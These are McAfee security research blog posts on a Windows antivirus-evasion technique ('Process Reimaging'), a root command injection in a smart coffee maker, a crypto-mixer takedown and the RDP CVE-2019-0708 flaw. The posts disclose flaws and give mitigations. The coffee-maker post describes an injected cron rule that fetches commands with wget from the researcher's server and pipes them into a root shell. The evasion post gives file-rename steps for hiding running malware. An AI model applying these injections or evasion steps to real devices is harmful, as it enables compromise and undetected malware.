Plain and simple, the objective of malicious threat actors is to bypass endpoint security. It is this exact game of cat and mouse that the security industry has been playing with malware writers for years, and one that, quite frankly, will continue. This ongoing battle will shape the future of cyber, and drive innovation in attack techniques and the ways in which we defend against them.  As part of this process it is crucial that we, the McAfee ATR team, continually identify techniques that could be used by malicious actors successfully.  It is this work that has led to the identification of a technique we call Process Reimaging, which was successful in bypassing endpoint security solutions (ESSs). To be clear, our objective is to stay ahead of malicious actors in identifying evasion techniques, with the broader goal of providing a safer computing environment for all organizations.

This technique is detailed by Eoin in a comprehensive technical blog titled In NTDLL I Trust – Process Reimaging and Endpoint Security Solution Bypass. The following is a summary of the findings.

Process Reimaging targets non-EDR ESSs.  It’s a post exploitation technique, meaning it targets users who have already fallen victim, for example to a phishing or a drive-by-download attack, so that the process can execute undetected and dwell on an endpoint for an significant period of time. The Windows kernel exports functionality to support the user mode components of ESSs which they depend on for protection and detection capabilities. There are numerous APIs such as K32GetProcessImageFileName that allows the ESSs “to verify a process attribute to determine whether it contains malicious binaries and whether it can be trusted to call into its infrastructure.” It was this functionality that our research focused on since the APIs return stale and inconsistent FILE_OBJECT paths, this potentially allows a malicious actor to bypass the process attribute verification undertaken by the Windows Operating System.   To be more precise, this allowed McAfee ATR to develop a proof-of-concept that was not detected by Windows Defender and will not be detected until a signature is created to block the file on disk before the process itself is created or a full scan is executed.

It is because the ESS relies on the Windows operating system to verify the process attributes that this technique is actually successful.  Whereby the ESS will naturally trust a particular process with a non-malicious file on disk since it makes the assumption that the O/S has verified the correct file on disk associated with that process, for the ESS to scan.

Releasing details of the technique

With the public release of security research, there is always a significant risk that any released information can be utilized by adversaries for nefarious activities. The balance of security research versus irresponsible disclosure is an issue we continually wrestle with, and these findings are no different. In the process of conducting due diligence, we were able to identify the use of Process Doppelganging with Process Hollowing as its fallback defense evasion technique within the SynAck ransomware in 2018.  Since Process Doppelganging technique was weaponized within SynAck ransomware less than five months after it’s disclosure at Blackhat Europe in 2017, we can only assume that the Process Reimaging technique itself is, or rather will be close to usage by threat actors to bypass detection.

The post Why Process Reimaging Matters appeared first on McAfee Blogs.

In NTDLL I Trust – Process Reimaging and Endpoint Security Solution Bypass

Process Reimaging Overview

The Windows Operating System has inconsistencies in how it determines process image FILE_OBJECT locations, which impacts non-EDR (Endpoint Detection and Response) Endpoint Security Solution’s (such as Microsoft Defender Realtime Protection), ability to detect the correct binaries loaded in malicious processes. This inconsistency has led McAfee’s Advanced Threat Research to develop a new post-exploitation evasion technique we call “Process Reimaging”. This technique is equivalent in impact to Process Hollowing or Process Doppelganging within the Mitre Attack Defense Evasion Category; however, it is , much easier to execute as it requires no code injection. While this bypass has been successfully tested against current versions of Microsoft Windows and Defender, it is highly likely that the bypass will work on any endpoint security vendor or product implementing the APIs discussed below.

The Windows Kernel, ntoskrnl.exe, exposes functionality through NTDLL.dll APIs to support User-mode components such as Endpoint Security Solution (ESS) services and processes. One such API is K32GetProcessImageFileName, which allows ESSs to verify a process attribute to determine whether it contains malicious binaries and whether it can be trusted to call into its infrastructure. The Windows Kernel APIs return stale and inconsistent FILE_OBJECT paths, which enable an adversary to bypass Windows operating system process attribute verification. We have developed a proof-of-concept which exploits this FILE_OBJECT location inconsistency by hiding the physical location of a process EXE.

The PoC allowed us to persist a malicious process (post exploitation) which does not get detected by Windows Defender.

The Process Reimaging technique cannot be detected by Windows Defender until it has a signature for the malicious file and blocks it on disk before process creation or performs a full scan on suspect machine post compromise to detect file on disk. In addition to Process Reimaging Weaponization and Protection recommendations, this blog includes a technical deep dive on reversing the Windows Kernel APIs for process attribute verification and Process Reimaging attack vectors. We use the SynAck Ransomware as a case study to illustrate Process Reimaging impact relative to Process Hollowing and Doppelganging; this illustration does not relate to Windows Defender ability to detect Process Hollowing or Doppelganging but the subverting of trust for process attribute verification.

Antivirus Scanner Detection Points

When an Antivirus scanner is active on a system, it will protect against infection by detecting running code which contains malicious content, and by detecting a malicious file at write time or load time.

The actual sequence for loading an image is as follows:

  • FileCreate – the file is opened to be able to be mapped into memory.
  • Section Create – the file is mapped into memory.
  • Cleanup – the file handle is closed, leaving a kernel object which is used for PAGING_IO.
  • ImageLoad – the file is loaded.
  • CloseFile – the file is closed.

If the Antivirus scanner is active at the point of load, it can use any one of the above steps (1,2 and 4) to protect the operating system against malicious code. If the virus scanner is not active when the image is loaded, or it does not contain definitions for the loaded file, it can query the operating system for information about which files make up the process and scan those files. Process Reimaging is a mechanism which circumvents virus scanning at step 4, or when the virus scanner either misses the launch of a process or has inadequate virus definitions at the point of loading.

There is currently no documented method to securely identify the underlying file associated with a running process on windows.

This is due to Windows’ inability to retrieve the correct image filepath from the NTDLL APIs.  This can be shown to evade Defender (MpMsEng.exe/MpEngine.dll) where the file being executed is a “Potentially Unwanted Program” such as mimikatz.exe. If Defender is enabled during the launch of mimikatz, it detects at phase 1 or 2 correctly.  If Defender is not enabled, or if the launched program is not recognized by its current signature files, then the file is allowed to launch. Once Defender is enabled, or the signatures are updated to include detection, then Defender uses K32GetProcessImageFileName to identify the underlying file. If the process has been created using our Process Reimaging technique, then the running malware is no longer detected. Therefore, any security service auditing running programs will fail to identify the files associated with the running process.

Subverting Trust

The Mitre ATT&CK model specifies post-exploitation tactics and techniques used by adversaries, based on real-world observations for Windows, Linux and macOS Endpoints per figure 1 below.

Figure 1 – Mitre Enterprise ATT&CK

Once an adversary gains code execution on an endpoint, before lateral movement, they will seek to gain persistence, privilege escalation and defense evasion capabilities. They can achieve defense evasion using process manipulation techniques to get code executing in a trusted process. Process manipulation techniques have existed for a long time and evolved from Process Injection to Hollowing and Doppelganging with the objective of impersonating trusted processes. There are other Process manipulation techniques as documented by Mitre ATT&CK and Unprotect Project,  but we will focus on Process Hollowing and Process Doppelganging. Process manipulation techniques exploit legitimate features of the Windows Operating System to impersonate trusted process executable binaries and generally require code injection.

ESSs place inherent trust in the Windows Operating System for capabilities such as digital signature validation and process attribute verification. As demonstrated by Specter Ops, ESSs’ trust in the Windows Operating system could be subverted for digital signature validation.

Similarly, Process Reimaging subverts an ESSs’ trust in the Windows Operating System for process attribute verification.

When a process is trusted by an ESS, it is perceived to contain no malicious code and may also be trusted to call into the ESS trusted infrastructure.

McAfee ATR uses the Mitre ATT&CK framework to map adversarial techniques, such as defense evasion, with associated campaigns. This insight helps organizations understand adversaries’ behavior and evolution so that they can assess their security posture and respond appropriately to contain and eradicate attacks. McAfee ATR creates and shares Yara rules based on threat analysis to be consumed for protect and detect capabilities.

Process Manipulation Techniques (SynAck Ransomware)

McAfee Advanced Threat Research analyzed SynAck ransomware in 2018 and discovered it used Process Doppelganging with Process Hollowing as its fallback defense evasion technique. We use this malware to explain the Process Hollowing and Process Doppelganging techniques, so that they can be compared to Process Reimaging based on a real-world observation.

Process Manipulation defense evasion techniques continue to evolve. Process Doppelganging was publicly announced in 2017, requiring advancements in ESSs for protection and detection capabilities. Because process manipulation techniques generally exploit legitimate features of the Windows Operating system they can be difficult to defend against if the Antivirus scanner does not block prior to process launch.

Process Hollowing

Process hollowing occurs when a process is created in a suspended state then its memory is unmapped and replaced with malicious code. Execution of the malicious code is masked under a legitimate process and may evade defenses and detection analysis” (see figure 2 below)

Figure 2 – SynAck Ransomware Defense Evasion with Process Hollowing

Process Doppelganging

Process Doppelgänging involves replacing the memory of a legitimate process, enabling the veiled execution of malicious code that may evade defenses and detection. Process Doppelgänging’s use of Windows Transactional NTFS (TxF) also avoids the use of highly-monitored API functions such as NtUnmapViewOfSection, VirtualProtectEx, and SetThreadContext” (see figure 3 below)

Figure 3 – SynAck Ransomware Defense Evasion with Doppleganging

Process Reimaging Weaponization

The Windows Kernel APIs return stale and inconsistent FILE_OBJECT paths which enable an adversary to bypass windows operating system process attribute verification. This allows an adversary to persist a malicious process (post exploitation) by hiding the physical location of a process EXE (see figure 4 below).

Figure 4 – SynAck Ransomware Defense Evasion with Process Reimaging

Process Reimaging Technical Deep Dive

NtQueryInformationProcess retrieves all process information from EPROCESS structure fields in the kernel and NtQueryVirtualMemory retrieves information from the Virtual Address Descriptors (VADs) field in EPROCESS structure.

The EPROCESS structure contains filename and path information at the following fields/offsets (see figure 5 below):

  • +0x3b8 SectionObject (filename and path)
  • +0x448 ImageFilePointer* (filename and path)
  • +0x450 ImageFileName (filename)
  • +0x468 SeAuditProcessCreationInfo (filename and path)

* this field is only present in Windows 10

Figure 5 – Code Complexity IDA Graph Displaying NtQueryInformationProcess Filename APIs within NTDLL

Kernel API NtQueryInformationProcess is consumed by following the kernelbase/NTDLL APIs:

  • K32GetModuleFileNameEx
  • K32GetProcessImageFileName
  • QueryFullProcessImageImageFileName

The VADs hold a pointer to FILE_OBJECT for all mapped images in the process, which contains the filename and filepath (see figure 6 below).

Kernel API NtQueryVirtualMemory is consumed by following the kernelbase/NTDLL API:

  • GetMappedFileName

Figure 6 – Code Complexity IDA Graph Displaying NtQueryVirtualMemory Filename API within NTDLL

Windows fails to update any of the above kernel structure fields when a FILE_OBJECT filepath is modified post-process creation. Windows does update FILE_OBJECT filename changes, for some of the above fields.

The VADs reflect any filename change for a loaded image after process creation, but they don’t reflect any rename of the filepath.

The EPROCESS fields also fail to reflect any renaming of the process filepath and only the ImageFilePointer field reflects a filename change.

As a result, the APIs exported by NtQueryInformationProcess and NtQueryVirtualMemory return incorrect process image file information when called by ESSs or other Applications (see Table 1 below).

Table 1 OS/Kernel version and API Matrix

Prerequisites for all Attack Vectors

Process Reimaging targets the post-exploitation phase, whereby a threat actor has already gained access to the target system. This is the same prerequisite of Process Hollowing or Doppelganging techniques within the Defense Evasion category of the Mitre ATT&CK framework.

Process Reimaging Attack Vectors
FILE_OBJECT Filepath Changes

Simply renaming the filepath of an executing process results in Windows OS returning the incorrect image location information for all APIs (See figure 7 below).  This impacts all Windows OS versions at the time of testing.

Figure 7 FILE_OBJECT Filepath Changes – Filepath Changes Impact all Windows OS versions

FILE_OBJECT Filename Changes

Filename Change >= Windows 10

Simply renaming the filename of an executing process results in Windows OS returning the incorrect image information for K32GetProcessImageFileName API (See figure 8.1.1 below). This has been confirmed to impact Windows 10 only.

Figure 8.1.1 FILE_OBJECT Filename Changes – Filename Changes impact Windows >= Windows 10

Per figure 8.1.2 below, GetModuleFileNameEx and QueryFullProcessImageImageFileName will get the correct filename changes due to a new EPROCESS field ImageFilePointer at offset 448.  The instruction there (mov r12, [rbx+448h]) references the ImageFilePointer from offset 448 into the EPROCESS structure.

Figure 8.1.2 NtQueryInformationProcess (Windows 10) – Windows 10 RS1 x64 ntoskrnl version 10.0.14393.0

Filename Change < Windows 10

Simply renaming the filename of an executing process results in Windows OS returning the incorrect image information for K32GetProcessImageFileName, GetModuleFileNameEx and QueryFullProcessImageImageFileName APIs (See figure 8.2.1 below). This has been confirmed to impact Windows 7 and Windows 8.

Figure 8.2.1 FILE_OBJECT Filename Changes – Filename Changes Impact Windows < Windows 10

Per Figure8.2.2 below, GetModuleFileNameEx and QueryFullProcessImageImageFileName will get the incorrect filename (PsReferenceProcessFilePointer references EPROCESS offset 0x3b8 SectionObject).

Figure 8.2.2 NtQueryInformationProcess (Windows 7 and 8) – Windows 7 SP1 x64 ntoskrnl version 6.1.7601.17514

LoadLibrary FILE_OBJECT reuse

LoadLibrary FILE_OBJECT reuse leverages the fact that when a LoadLibrary or CreateProcess is called after a LoadLibrary and FreeLibrary on an EXE or DLL, the process reuses the existing image FILE_OBJECT in memory from the prior LoadLibrary.

Exact Sequence is:

  1. LoadLibrary (path\filename)
  2. FreeLibrary (path\filename)
  3. LoadLibrary (renamed path\filename) or CreateProcess (renamed path\filename)

This results in Windows creating a VAD entry in the process at step 3 above, which reuses the same FILE_OBJECT still in process memory, created from step 1 above. The VAD now has incorrect filepath information for the file on disk and therefore the GetMappedFileName API will return the incorrect location on disk for the image in question.

The following prerequisites are required to evade detection successfully:

  • The LoadLibrary or CreateProcess must use the exact same file on disk as the initial LoadLibrary
  • Filepath must be renamed (dropping the same file into a newly created path will not work)

The Process Reimaging technique can be used in two ways with LoadLibrary FILE_OBJECT reuse attack vector:

  1. LoadLibrary (see figure 9 below)
    1. When an ESS or Application calls the GetMappedFileName API to retrieve a memory-mapped image file, Process Reimaging will cause Windows OS to return the incorrect path. This impacts all Windows OS versions at the time of testing.

Figure 9 LoadLibrary FILE_OBJECT Reuse (LoadLibrary) – Process Reimaging Technique Using LoadLibrary Impacts all Windows OS Versions

2. CreateProcess (See figure 10 below)

    1. When an ESS or Application calls the GetMappedFileName API to retrieve the process image file, Process Reimaging will cause Windows OS to return the incorrect path. This impacts all Windows OS versions at the time of testing.

Figure 10 LoadLibrary FILE_OBJECT Reuse (CreateProcess) – Process Reimaging Technique using CreateProcess Impacts all Windows OS Versions

Process Manipulation Techniques Comparison

Windows Defender Process Reimaging Filepath Bypass Demo

This video simulates a zero-day malware being dropped (Mimikatz PUP sample) to disk and executed as the malicious process “phase1.exe”. Using the Process Reimaging Filepath attack vector we demonstrate that even if Defender is updated with a signature for the malware on disk it will not detect the running malicious process. Therefore, for non-EDR ESSs such as Defender Real-time Protection (used by Consumers and also Enterprises) the malicious process can dwell on a windows machine until a reboot or the machine receives a full scan post signature update.

CVSS and Protection Recommendations

CVSS

If a product uses any of the APIs listed in table 1 for the following use cases, then it is likely vulnerable:

  1. Process reputation of a remote process – any product using the APIs to determine if executing code is from a malicious file on disk

CVSS score 5.0 (Medium)  https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N (same score as Doppelganging)

  1. Trust verification of a remote process – any product using the APIs to verify trust of a calling process

CVSS score will be higher than 5.0; scoring specific to Endpoint Security Solution architecture

Protection Recommendations

McAfee Advanced Threat Research submitted Process Reimaging technique to Microsoft on June 5th, 2018. Microsoft released a partial mitigation to Defender in the June 2019 Cumulative update for the Process Reimaging FILE_OBJECT filename changes attack vector only. This update was only for Windows 10 and does not address the vulnerable APIs in Table 1 at the OS level; therefore, ESSs are still vulnerable to Process Reimaging. Defender also remains vulnerable to the FILE_OBJECT filepath changes attack vector executed in the bypass demo video, and this attack vector affects all Windows OS versions.

New and existing Process Manipulation techniques which abuse legitimate Operating System features for defense evasion are difficult to prevent dynamically by monitoring specific API calls as it can lead to false positives such as preventing legitimate processes from executing.

A process which has been manipulated by Process Reimaging will be trusted by the ESS unless it has been traced by EDR or a memory scan which may provide deeper insight.

Mitigations recommended to Microsoft
  1. File System Synchronization (EPROCESS structures out of sync with the filesystem or File Control Block structure (FCB)
    1. Allow the EPROCESS structure fields to reflect filepath changes as is currently implemented for the filename in the VADs and EPROCESS ImageFilePointer fields.
    2. There are other EPROCESS fields which do not reflect changes to filenames and need to be updated, such as K32GetModuleFileNameEx on Windows 10 through the ImageFilePointer.
  2. API Usage (most returning file info for process creation time)
    1. Defender (MpEngine.dll) currently uses K32GetProcessImageFileName to get process image filename and path when it should be using K32GetModuleFileNameEx.
    2. Consolidate the duplicate APIs being exposed from NtQueryInformationProcess to provide easier management and guidance to consumers that require retrieving process filename information. For example, clearly state GetMappedFileName should only be used for DLLs and not EXE backing process).
    3. Differentiate in API description whether the API is only limited to retrieving the filename and path at process creation or real-time at time of request.
  3. Filepath Locking
    1. Lock filepath and name similar to lock file modification when a process is executing to prevent modification.
    2. Standard user at a minimum should not be able to rename binary paths for its associated executing process.
  4. Reuse of existing FILE_OBJECT with LoadLibrary API (Prevent Process Reimaging)
    1. LoadLibrary should verify any existing FILE_OBJECT it reuses, has the most up to date Filepath at load time.
  5. Short term mitigation is that Defender should at least flag that it found malicious process activity but couldn’t find associated malicious file on disk (right now it fails open, providing no notification as to any potential threats found in memory or disk).
Mitigation recommended to Endpoint Security Vendors

The FILE_OBJECT ID must be tracked from FileCreate as the process closes its handle for the filename by the time the image is loaded at ImageLoad.

This ID must be managed by the Endpoint Security Vendor so that it can be leveraged to determine if a process has been reimaged when performing process attribute verification.

The post In NTDLL I Trust – Process Reimaging and Endpoint Security Solution Bypass appeared first on McAfee Blogs.

Mr. Coffee with WeMo: Double Roast

McAfee Advanced Threat Research recently released a blog detailing a vulnerability in the Mr. Coffee Coffee Maker with WeMo. Please refer to the earlier blog to catch up with the processes and techniques I used to investigate and ultimately compromise this smart coffee maker. While researching the device, there was always one attack vector that I had wanted to revisit. It was during the writing of that blog that I was finally able to circle back to it. As it turns out, my intuition was accurate; the second vulnerability I found was much simpler and still allowed me to gain root access to the target.

Recapping the original vulnerability

The first vulnerability modified the “template” section of the brew schedule rule file, which a is unique file that is sent when the user schedules a brew in advance. I also needed to modify the template itself, sent from the WeMo App directly to the coffee maker. During that research I noticed that many of the other fields could be impactful but did not investigate them as thoroughly as the template field.

Figure 1: Brew schedule rule

When the user schedules a brew, an individual rule is added to the Mr. Coffee root crontab. The crontab entry uses the rule’s “id” field to make sure the correct rule is executed at the desired time.

Figure 2: Root crontab entry

Crontab allows for basic scheduling features from the OS level. The user provides both the command to execute as well as timing details down to the minute, as shown in Figure 3.

Figure 3: Crontab syntax

During the initial research, I started to fuzz the rule id field; however, because every rule name that I placed in the malicious schedule was always prepended by the “/sbin/rtng_run_rule”, I could not get anything abnormal to happen. I also noticed that a lot of characters that could be useful for command injection were being filtered.

The following is a list of characters sanitized or filtered on input.

At this point I moved on and ended up finding the template vulnerability as laid out in the previous blog.

Finding an even more simple vulnerability

A few months after disclosing to Belkin, I revisited the steps to achieve this template abuse feature, in preparation for a public disclosure blog. Having the ability to write arbitrary code directly into the root’s crontab is enticing, so I began looking into it again. I needed to find a way to terminate the “rtng_run_rule” and add my own commands to the crontab file by modifying the “id” field. The “rtng_run_rule” file is a shell script that directly calls a Lua script named “rtng_run_rule.lua”. I noticed that I could send the double pipe “||” character but the “rtng_run_rule” wrapper script would never return a failing return code. Next, I looked at the how the wrapper script is handling command line arguments as shown below.

Figure 4: rtng_run_rule wrapper script

At this point I created a new rule: “-f|| touch test”. The “-f” is not a parsed argument, meaning it will take the “Bad option” case, causing the “rtng_run_rule” wrapper script to return “-1”. With the wrapper script returning a failing return code, the “||” (or) statement is initiated, which executes “touch test” and creates an empty file named “test”. Since I still had serial access (I explain in detail in my previous blog how I achieved this) I was able to log in to the coffee maker and find where the “test” file was located. I found it in root’s home directory.

Being able to write arbitrary files and execute commands without the “/” character is still somewhat limiting, as most file paths and web URLs will need forward slashes. I needed to find a way to execute commands that had “/” characters in them. I decided to do this by downloading a file from a webserver I control and executing it in Ash to bypass file path sanitization characters.

Figure 5: Commands allowing for execution of filtered characters.

Let me break this down. The “-f” as indicated before will cause the wrapper script to execute the “||” command. Then the “wget” command will initiate a download from my web server, located at IP address “172.16.127.31.” The “-q” will force wget to only print what it receives, and the “-O -“ tells wget to print to STDOUT instead of a file. Finally, the “| ash” command grabs all the output from STDOUT and executes it as Linux shell commands.

This way I can set up a server that simply returns a file containing necessary Linux commands and host it on my local machine. When I send the rule with the above command injection it will reach out to my local server and execute everything as root. The technique of piping wget into Ash also bypasses all the character filtering so I can now execute any command I want.

Status with Vendor

Belkin did patch the original template vulnerability and released new firmware. The vulnerability explained in this blog was found on the new firmware and, as of today, we have not heard of any plans for a patch. This vulnerability was disclosed to Belkin on February 25th, 2019. In accordance with our vulnerability disclosure policy, we are releasing details of this flaw today in hopes of alerting consumers of the device of the ongoing security findings. While this bug is also within the Mr. Coffee with WeMo’s scheduling function, it is much easier for an attacker to leverage since it does not require any modifications to templates or rehashing of code changes.The following demo video shows how this vulnerability can be used to compromise other devices on the network, including a fully patched Windows 10 PC.

Key takeways for enterprises, consumers and vendors

Devices such as the Mr. Coffee Coffee Maker with WeMo serve as a good reminder of the pros and cons to “smart” IoT. While advances in automation and technology offer exciting new capabilities, they should be weighed against the potential security concerns. In a home setting, consumers should set up these types of devices on a segmented network, isolated from sensitive network traffic and more critical devices. They should implement a strong password policy to make network access more challenging and apply patches or updates for all networked devices whenever available. Enterprises should restrict access to devices such as these in corporate environments or, at a minimum, provide a policy for oversight and management. They should be treated just the same as any other asset on the network, as IoT devices are often unmonitored pivot points into more critical network infrastructure. Network scanning and vulnerability assessments should be performed, in conjunction with a rigorous patching cycle for known issues. While the vendor has not provided a CVE for this vulnerability, we calculated a CVSS score of 9.1 out of 10. This score would categorize this as a critical vulnerability.Finally, as consumers of these products, we need to ask more of the vendors and manufacturers. A better understanding of secure coding and vulnerability assessment is critical, before products go to market. Vendors who implement a vulnerability reporting program and respond quickly can gain consumers’ trust and ensure product reputation is undamaged. One goal of the McAfee Advanced Threat Research team is to identify and illuminate a broad spectrum of threats in today’s complex and constantly evolving landscape. Through analysis and responsible disclosure, we aim to guide product manufacturers toward a more comprehensive security posture.

The post Mr. Coffee with WeMo: Double Roast appeared first on McAfee Blogs.

Cryptocurrency Laundering Service, BestMixer.io, Taken Down by Law Enforcement

A much overlooked but essential part in financially motivated (cyber)crime is making sure that the origins of criminal funds are obfuscated or made to appear legitimate, a process known as money laundering. ’Cleaning’ money in this way allows the criminal to spend their loot with less chance of being caught. In the physical world, for instance, criminals move large sums of cash into offshore accounts and create shell companies to obfuscate the origins of their funds. In the cyber underground where Bitcoin is the equivalent of cash money, it works a bit differently. As Bitcoin has an open ledger on which every transaction is recorded, it makes it a bit more challenging to obfuscate funds.

When a victim pays a criminal after being extorted with ransomware, the ransom transaction in Bitcoin and all additional transactions can then be tracked through the open ledger. This makes following the money a powerful investigative technique, but criminals have come up with an inventive method to make tracking more difficult; a mixing service.

A mixing service will cut up a sum of Bitcoins into hundreds of smaller transactions and mixes different transactions from other sources for obfuscation and will pump out the input amount, minus a fee, to a certain output address. Mixing Bitcoins that are obtained legally is not a crime but, other than the mathematical exercise, there no real benefit to it.

The legality changes when a mixing service advertises itself as a success method to avoid various anti-money laundering policies via anonymity. This is actively offering a money laundering service.

Bestmixer.io

Last year advertisements for new mixing service called Bestmixer.io appeared on several Crypto currency related websites.

Judging by the article It sounded like it offered a service that could be considered money laundering or aid tax evasion.

Bestmixer’s frontpage

Nature of the service

Bestmixer offered a very clear page on why someone should mix their cryptocurrency. On this page Bestmixer described the current anti-money laundering policies and how its service could help evade these policies by making funds anonymous and untraceable. Offering such a service is considered illegal in many countries.

Bestmixer’s explanation page, “why someone should mix bitcoins”.

A closer inspection of the Bestmixer site revealed that its website was hosted in the Netherlands. McAfee ATR contacted the Financial Advanced Cyber Team (FACT) of the Dutch anti-Fraud Agency (FIOD) of Bestmixer.io’s location. FACT is a team that is specialized in investigating the financial component of (cyber)crime.  A yearlong International investigation led to the takedown of Bestmixer’s infrastructure today.

The post Cryptocurrency Laundering Service, BestMixer.io, Taken Down by Law Enforcement appeared first on McAfee Blogs.

RDP Stands for “Really DO Patch!” – Understanding the Wormable RDP Vulnerability CVE-2019-0708

During Microsoft’s May Patch Tuesday cycle, a security advisory was released for a vulnerability in the Remote Desktop Protocol (RDP). What was unique in this particular patch cycle was that Microsoft produced a fix for Windows XP and several other operating systems, which have not been supported for security updates in years. So why the urgency and what made Microsoft decide that this was a high risk and critical patch?

According to the advisory, the issue discovered was serious enough that it led to Remote Code Execution and was wormable, meaning it could spread automatically on unprotected systems. The bulletin referenced well-known network worm “WannaCry” which was heavily exploited just a couple of months after Microsoft released MS17-010 as a patch for the related vulnerability in March 2017. McAfee Advanced Threat Research has been analyzing this latest bug to help prevent a similar scenario and we are urging those with unpatched and affected systems to apply the patch for CVE-2019-0708 as soon as possible. It is extremely likely malicious actors have weaponized this bug and exploitation attempts will likely be observed in the wild in the very near future.

Vulnerable Operating Systems:

  • Windows 2003
  • Windows XP
  • Windows 7
  • Windows Server 2008
  • Windows Server 2008 R2

Worms are viruses which primarily replicate on networks. A worm will typically execute itself automatically on a remote machine without any extra help from a user. If a virus’ primary attack vector is via the network, then it should be classified as a worm.

The Remote Desktop Protocol (RDP) enables connection between a client and endpoint, defining the data communicated between them in virtual channels. Virtual channels are bidirectional data pipes which enable the extension of RDP. Windows Server 2000 defined 32 Static Virtual Channels (SVCs) with RDP 5.1, but due to limitations on the number of channels further defined Dynamic Virtual Channels (DVCs), which are contained within a dedicated SVC. SVCs are created at the start of a session and remain until session termination, unlike DVCs which are created and torn down on demand.

It’s this 32 SVC binding which CVE-2019-0708 patch fixes within the _IcaBindVirtualChannels and _IcaRebindVirtualChannels functions in the RDP driver termdd.sys. As can been seen in figure 1, the RDP Connection Sequence connections are initiated and channels setup prior to Security Commencement, which enables CVE-2019-0708 to be wormable since it can self-propagate over the network once it discovers open port 3389.

 

Figure 1: RDP Protocol Sequence

The vulnerability is due to the “MS_T120” SVC name being bound as a reference channel to the number 31 during the GCC Conference Initialization sequence of the RDP protocol. This channel name is used internally by Microsoft and there are no apparent legitimate use cases for a client to request connection over an SVC named “MS_T120.”

Figure 2 shows legitimate channel requests during the GCC Conference Initialization sequence with no MS_T120 channel.

Figure 2: Standard GCC Conference Initialization Sequence

However, during GCC Conference Initialization, the Client supplies the channel name which is not whitelisted by the server, meaning an attacker can setup another SVC named “MS_T120” on a channel other than 31. It’s the use of MS_T120 in a channel other than 31 that leads to heap memory corruption and remote code execution (RCE).

Figure 3 shows an abnormal channel request during the GCC Conference Initialization sequence with “MS_T120” channel on channel number 4.

 

Figure 3: Abnormal/Suspicious GCC Conference Initialization Sequence – MS_T120 on nonstandard channel

The components involved in the MS_T120 channel management are highlighted in figure 4. The MS_T120 reference channel is created in the rdpwsx.dll and the heap pool allocated in rdpwp.sys. The heap corruption happens in termdd.sys when the MS_T120 reference channel is processed within the context of a channel index other than 31.

Figure 4: Windows Kernel and User Components

The Microsoft patch as shown in figure 5 now adds a check for a client connection request using channel name “MS_T120” and ensures it binds to channel 31 only (1Fh) in the _IcaBindVirtualChannels and _IcaRebindVirtualChannels functions within termdd.sys.

 

Figure 5: Microsoft Patch Adding Channel Binding Check

After we investigated the patch being applied for both Windows 2003 and XP and understood how the RDP protocol was parsed before and after patch, we decided to test and create a Proof-of-Concept (PoC) that would use the vulnerability and remotely execute code on a victim’s machine to launch the calculator application, a well-known litmus test for remote code execution.

Figure 6: Screenshot of our PoC executing

For our setup, RDP was running on the machine and we confirmed we had the unpatched versions running on the test setup. The result of our exploit can be viewed in the following video:

There is a gray area to responsible disclosure. With our investigation we can confirm that the exploit is working and that it is possible to remotely execute code on a vulnerable system without authentication. Network Level Authentication should be effective to stop this exploit if enabled; however, if an attacker has credentials, they will bypass this step.

As a patch is available, we decided not to provide earlier in-depth detail about the exploit or publicly release a proof of concept. That would, in our opinion, not be responsible and may further the interests of malicious adversaries.

Recommendations:

  • We can confirm that a patched system will stop the exploit and highly recommend patching as soon as possible.
  • Disable RDP from outside of your network and limit it internally; disable entirely if not needed. The exploit is not successful when RDP is disabled.
  • Client requests with “MS_T120” on any channel other than 31 during GCC Conference Initialization sequence of the RDP protocol should be blocked unless there is evidence for legitimate use case.

 

It is important to note as well that the RDP default port can be changed in a registry field, and after a reboot will be tied the newly specified port. From a detection standpoint this is highly relevant.

Figure 7: RDP default port can be modified in the registry

Malware or administrators inside of a corporation can change this with admin rights (or with a program that bypasses UAC) and write this new port in the registry; if the system is not patched the vulnerability will still be exploitable over the unique port.

McAfee Customers:

McAfee NSP customers are protected via the following signature released on 5/21/2019:

0x47900c00 “RDP: Microsoft Remote Desktop MS_T120 Channel Bind Attempt”

If you have any questions, please contact McAfee Technical Support.

 

The post RDP Stands for “Really DO Patch!” – Understanding the Wormable RDP Vulnerability CVE-2019-0708 appeared first on McAfee Blogs.